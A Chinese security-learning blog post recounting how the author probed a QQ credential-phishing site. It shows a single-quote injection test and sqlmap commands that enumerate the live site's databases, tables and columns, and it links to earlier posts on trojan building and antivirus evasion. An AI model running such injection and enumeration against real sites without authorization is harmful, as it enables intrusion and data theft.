本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记
前文链接
- WAMP/DVWA/sqli-labs 搭建
- burpsuite工具抓包及Intruder暴力破解的使用
- 目录扫描,请求重发,漏洞扫描等工具的使用
- 网站信息收集及nmap的下载使用
- SQL注入(1)——了解成因和手工注入方法
- SQL注入(2)——各种注入
- SQL注入(3)——SQLMAP
- SQL注入(4)——实战SQL注入拿webshell
- Vulnhub靶机渗透之Me and My Girlfriend
- XSS漏洞
- 文件上传漏洞
- 文件上传绕过
- 文件包含漏洞
- Vulnhub靶机渗透之zico2
- 命令执行漏洞
- 逻辑漏洞(越权访问和支付漏洞)
- 网站后台安全
- weevely的使用及免杀(Linux中的菜刀)
- MSF(1)——一次完整的渗透流程
- WebShell命令执行限制(解决方案)
- 记一次艰难的SQL注入(过安全狗)
- MSF(2)——各种木马的生成及简单的免杀
- MSF(3)——apk和exe的加马(过360、火绒)
- 通过Frp解决实现内网穿透
- 改造冰蝎马,实现免杀之default_aes php
- 使用FofaSpider和Python联动批量挖洞
起
晴朗的周一上午,我正在无聊地用电脑玩刺客信条,突然一个朋友打电话过来,告诉我他发现一个QQ盗号的网站,已经有人被骗了,要我赶快去看看。
随即发来一个附件,打开看到一个URL。
跟着URL进入网站,冲出来就是一个登录界面。
一眼盗号网站
承
随便输入账号密码,点下登录,一个验证码授权的界面
到这里此盗号网站的逻辑就很清晰了。先伪装成学期档案校对,骗取小白输入账号密码,收取小白的验证码,从而实施盗号。
我输了我的手机号想试试有没有短信轰炸漏洞,但是半天没收到短信,回去网站一看,
还要排队。也许,这网站后台是人工?
我去查了whois和备案信息,均无果。想去扫目录和子域名,怕扫崩。我决定先观察一下这个主站。
转
在输入了账号密码后进入号码验证的界面,可以明显看到URL中有参数id
尝试在id后加上单引号
一发入魂,直接上SQLMap。
python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259'
爆数据库
python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -dbs
爆表
python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -D rre -tables
爆字段
python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -D rre -T qq_list -columns
爆到这里就差不多了,及时收手。
合
最后我拿漏扫器爆扫了这个站点好几遍,发现上面还部署了好几个盗号界面。由于站点太过简单,甚至连后台管理都没有,只有SQL注入。
没想到这样简陋的页面也能骗到很多人,只能说希望大家加强防范吧。
后记
这个文章写完大概十几天后,我的一个朋友告诉我他的QQ被盗了,要我辅助他找回。然后他把那个盗他号的网站发过来。我一看,这不还是这个站点吗,只是换了一个子目录,连域名都没变。
我之前渗透的时候还把这个页面扫出来了,当时没管。今天再来测试,一模一样的SQL注入漏洞。
没想到过了这么久还能骗到人,真不知道我这朋友的211怎么考上的。
无话可说,加强防范